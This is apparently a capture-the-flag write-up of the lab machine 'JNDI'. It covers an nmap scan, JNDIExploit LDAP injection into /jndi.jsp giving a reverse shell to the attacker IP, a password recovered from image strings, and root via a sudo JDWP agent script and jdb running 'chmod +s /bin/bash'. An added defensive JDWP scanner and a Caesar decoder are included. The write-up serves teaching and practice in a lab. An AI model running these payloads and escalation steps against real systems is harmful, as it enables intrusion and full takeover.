
Group Member Target Machine -- JNDI


Author: 张小明


title: '群友靶机–JNDI'
date: 2026-03-29 21:00:28
categories: 靶机复现
tags:
  • 靶机复现
  • wp
  • 群友靶机
top_img: /img/top.jpg

JNDI

Machine name: JNDI
Author: S@Ku_γA
Machine ID: 620
Difficulty: Medium
Machine site: https://maze-sec.com
Target IP: 192.168.1.183
Attacker IP: 192.168.1.195 (Kali Linux)

Information gathering

┌──(root㉿Gropers)-[~]
└─# nmap -A -sT -p- 192.168.1.183
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 05:07 EDT
Nmap scan report for 192.168.1.183
Host is up (0.00077s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods:
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: \xE5\x88\xA9\xE5\x85\xB9\xE4\xB8\x8E\xE9\x9D\x92\xE9\xB8\x9F | \xE5\xB1\xB1\xE7\x94\xB0\xE5\xB0\x9A\xE5\xAD\x90\xE6\x89\xA7\xE5\xAF\xBC\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5\xE8\xAF\x97\xE7\xAF\x87
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
MAC Address: 08:00:27:88:D1:6A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.1.183

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds

Take a look at ports 80, 8009 and 8080.

The index page on port 8080 contains an HTML comment; an AI assistant pointed out that it looks like a Caesar cipher.

</p>
</section>
</div>
<!--ptjo.pyv-->
</body>
</html>

ptjo.pyv --> jndi.jsp

That reveals a new page, /jndi.jsp.
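Decoding the comment programmatically, as an added example that is not part of the original write-up: it tries all 26 shifts of the comment text and picks the one that yields a plausible web file name (the hint token list is an assumption of this example).

```python
# Added example, not from the original write-up: brute-force the Caesar shift
# of the HTML comment "ptjo.pyv" found on the port-8080 index page.
from typing import Dict, Optional

def caesar_shift(text: str, shift: int) -> str:
    """Move every ASCII letter back by `shift` places, keeping case and leaving
    other characters (the '.' in the file name) untouched."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

def brute_force(text: str) -> Dict[int, str]:
    """Every candidate plaintext keyed by the shift that produces it."""
    return {k: caesar_shift(text, k) for k in range(26)}

# Tokens a web file name is likely to contain; this list is an assumption of
# the example, not something the page states.
HINTS = ("jndi", "jsp", "php", "html")

def find_shift(text: str, hints=HINTS) -> Optional[int]:
    """First shift whose plaintext contains one of the hint tokens, else None."""
    for k, plain in brute_force(text).items():
        if any(h in plain for h in hints):
            return k
    return None

if __name__ == "__main__":
    comment = "ptjo.pyv"  # the value of the comment in the page source
    k = find_shift(comment)
    if k is not None:
        print(k, caesar_shift(comment, k))  # prints: 6 jndi.jsp
    else:
        print("no candidate matched; inspect brute_force(comment) by hand")
```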

user–bluebird

Recent Kali releases no longer ship OpenJDK 8 by default, yet many classic exploitation tools (JNDIExploit among them) depend on Java 8 internal classes.

So JNDIExploit has to get past Java 21's module encapsulation: we force it to run under Java 21 with launcher flags, and it then delivers the ELProcessor payload to the target successfully.

How it works: the two --add-exports flags tell Java 21 "export the internal packages you have locked away so my tool can use them".

┌──(root㉿Gropers)-[~]
└─# java \
  --add-exports=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
  --add-exports=java.xml/com.sun.org.apache.xalan.internal.xsltc.compiler=ALL-UNNAMED \
  -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.195
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 3456...
[+] Received LDAP Query: Basic/ReverseShell/192.168.1.195/4444
[+] Paylaod: reverseshell
[+] IP: 192.168.1.195
[+] Port: 4444
[+] Sending LDAP ResourceRef result for Basic/ReverseShell/192.168.1.195/4444 with basic remote reference payload
[+] Send LDAP reference result for Basic/ReverseShell/192.168.1.195/4444 redirecting to http://192.168.1.195:3456/ExploitIgjhDwjyYb.class
[+] New HTTP Request From /192.168.1.183:35142  /ExploitIgjhDwjyYb.class
[+] Receive ClassRequest: ExploitIgjhDwjyYb.class
[+] Response Code: 200

Start a listener

nc -lvnp 4444

The javax.el.ELProcessor payload failed to execute on the target, so we can try the other route JNDIExploit supports, which goes through Groovy (if the target ships that dependency).

┌──(root㉿Gropers)-[~]
└─# curl -X POST http://192.168.1.183:8080/jndi.jsp \
  --data-urlencode "jndi_name=ldap://192.168.1.195:1389/Basic/ReverseShell/192.168.1.195/4444"

┌──(root㉿Gropers)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.195] from (UNKNOWN) [192.168.1.183] 51978
bash: cannot set terminal process group (455): Inappropriate ioctl for device
bash: no job control in this shell
bluebird@JNDI:~$ id
uid=1001(bluebird) gid=1001(bluebird) groups=1001(bluebird)

That gives us a shell as the user bluebird.

user–liz

Looking around shows there is a second user, liz.

bluebird@JNDI:/home$ ls -al
total 16
drwxr-xr-x  4 root     root     4096 Mar 23 11:40 .
drwxr-xr-x 18 root     root     4096 Mar 25 04:28 ..
drwxr-xr-x  4 bluebird bluebird 4096 Mar 25 04:21 bluebird
drwxr-xr-x  2 liz      liz      4096 Mar 25 04:27 liz

Time to move laterally.

Checking the most recently modified files turns up an image, message.jpg, under /usr/message/.

bluebird@JNDI:/$ ls -al /usr/message/
total 876
drwxr-xr-x  2 root root   4096 Mar 24 02:27 .
drwxr-xr-x 15 root root   4096 Mar 24 02:26 ..
-rw-r--rwx  1 root root 888498 Mar 24 02:27 message.jpg

Use a regex to pull anything mentioning liz out of the image.

bluebird@JNDI:/$ strings -a /usr/message/message.jpg | grep -i liz
ilikeyousanmuximei(liz)

After a few attempts, liz's password turns out to be sanmuximei.

root

bluebird@JNDI:/$ su liz
Password:
liz@JNDI:/$ sudo -l
[sudo] password for liz:
Matching Defaults entries for liz on JNDI:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User liz may run the following commands on JNDI:
    (ALL) /bin/bash /opt/java_agent_start.sh
liz@JNDI:/$ cat /opt/java_agent_start.sh
#!/bin/bash
file_name=/opt/file/tmp
file_line=$(awk 'NR==1 {print;exit}' "$file_name")
file_line=$(basename $file_line)
cd /opt
echo $file_line
/usr/local/java/jdk1.8.0_20/bin/java -agentpath:/usr/local/java/jdk1.8.0_20/jre/lib/amd64/$file_line test
liz@JNDI:/$

Configure the JDWP debug payload

Note: write the parameter into the path the script reads. The script keeps only the basename of the first line, and because the agent options contain no slash they pass through unchanged into -agentpath, so the JVM loads libjdwp.so with these options, opens debug port 8888 and suspends until a debugger attaches.

echo 'libjdwp.so=transport=dt_socket,server=y,suspend=y,address=8888' > /opt/file/tmp
Trigger the root debug process

Note: launch the script with sudo. This window will sit waiting; keep it open.

sudo /bin/bash /opt/java_agent_start.sh
Privilege escalation by injecting code with jdb

Note: open a second shell on the target and use jdb to inject the command. Because the JVM runs as root, the chmod +s it executes makes bash setuid root.

# connect to the debug port
jdb -attach 127.0.0.1:8888
# --- the following is typed inside the jdb session ---
stop in java.io.PrintStream.println(java.lang.String)
run
# (wait for the breakpoint to hit)
print java.lang.Runtime.getRuntime().exec("chmod +s /bin/bash")
resume
quit
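As an added defensive example (not code from the original write-up), a small scanner that flags JVMs carrying a JDWP agent, such as the root-owned one the sudo script above launches. The process rows are constructed, and the all-interfaces default it notes applies to JDK 8 (the jdk1.8.0_20 on this box) when the address has no host part.

```python
# Added example, not code from the original write-up: flag JVMs that carry a
# JDWP debug agent, the exposure /opt/java_agent_start.sh creates above.
import re
from typing import Dict, List, Optional

# -agentlib:jdwp=OPTS, -Xrunjdwp:OPTS or -agentpath:/path/to/libjdwp.so=OPTS
JDWP_RE = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:|-agentpath:\S*?libjdwp\.so=)(\S+)")

# Constructed (pid, user, cmdline) rows; the first mirrors the command the sudo
# script on this box builds from the first line of /opt/file/tmp.
SAMPLE_PROCS = [
    (1203, "root", "/usr/local/java/jdk1.8.0_20/bin/java -agentpath:/usr/local/java/"
     "jdk1.8.0_20/jre/lib/amd64/libjdwp.so=transport=dt_socket,server=y,suspend=y,address=8888 test"),
    (1210, "tomcat", "/usr/bin/java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start"),
    (1220, "dev", "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:5005 -jar app.jar"),
]

def parse_jdwp_options(cmdline: str) -> Optional[Dict[str, str]]:
    """Return the JDWP key=value options from a java command line, or None."""
    m = JDWP_RE.search(cmdline)
    if not m:
        return None
    # "server=y".partition("=")[::2] -> ("server", "y")
    return dict(item.partition("=")[::2] for item in m.group(1).split(","))

def assess(user: str, cmdline: str) -> Optional[str]:
    """Explain why a JDWP-enabled JVM is risky, or None when no agent is loaded."""
    opts = parse_jdwp_options(cmdline)
    if opts is None:
        return None
    reasons = []
    addr = opts.get("address", "")
    host, _, port = addr.rpartition(":")  # "8888" -> host "", port "8888"
    if opts.get("server") == "y":
        if host in ("", "*", "0.0.0.0"):
            # JDK 8 binds every interface when no host is given; JDK 9+ defaults to localhost
            reasons.append("JDWP server on port %s reachable from any interface" % (port or "?"))
        else:
            reasons.append("JDWP server bound to %s" % addr)
    if user == "root":
        reasons.append("JVM runs as root, so anyone who can attach runs code as root")
    return "; ".join(reasons) or "JDWP agent loaded in client mode"

def scan(procs=SAMPLE_PROCS) -> List[str]:
    """One finding line per process that carries a JDWP agent."""
    return ["pid %d (%s): %s" % (pid, user, assess(user, cmd))
            for pid, user, cmd in procs if assess(user, cmd)]
```

On a live host the rows would come from `ps -eo pid,user,args`; the same check also belongs in the sudo review, since a rule that lets a user feed text into -agentpath is what made the root JVM reachable here.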
